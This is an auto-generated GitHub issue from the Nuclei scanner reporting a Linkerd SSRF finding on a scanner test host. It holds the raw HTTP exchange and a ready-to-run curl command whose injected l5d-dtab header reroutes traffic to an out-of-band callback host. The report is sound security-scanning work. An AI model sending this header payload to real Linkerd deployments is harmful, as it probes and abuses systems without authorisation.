search

mkrs2404 / tickets

0 stars 0 forks source link

Linkerd SSRF detection (linkerd-ssrf-detection) found on honey.scanme.sh #48

Closed mkrs2404 closed 2 months ago

mkrs2404 commented 5 months ago

Details: linkerd-ssrf-detection matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh

Timestamp: Tue Apr 30 19:28:29 +0530 IST 2024

Template Information

Key Value
Name Linkerd SSRF detection
Authors dudez
Tags ssrf, linkerd, oast, misconfig
Severity high
Description Linkerd is vulnerable to SSRF.

Request

GET / HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Connection: close
Accept: */*
Accept-Language: en
l5d-dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 335
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:25 GMT

GET / HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
L5d-Dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79

Interaction Data

http Interaction from 67.205.158.113 at coofgv4mjeun8ktjo61gfysun3uufzru4 Interaction Request

GET / HTTP/1.1
Host: coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1

Interaction Response

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Server: oast.me
X-Interactsh-Version: 1.1.8

<html><head></head><body>4urzfuu3nusyfg16ojtk8nuejm4vgfooc</body></html>

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79' -H 'l5d-dtab: /svc/* => /$/inet/coofgv4mjeun8ktjo61gfysun3uufzru4.oast.me/443' 'https://honey.scanme.sh'

Generated by Nuclei v3.2.5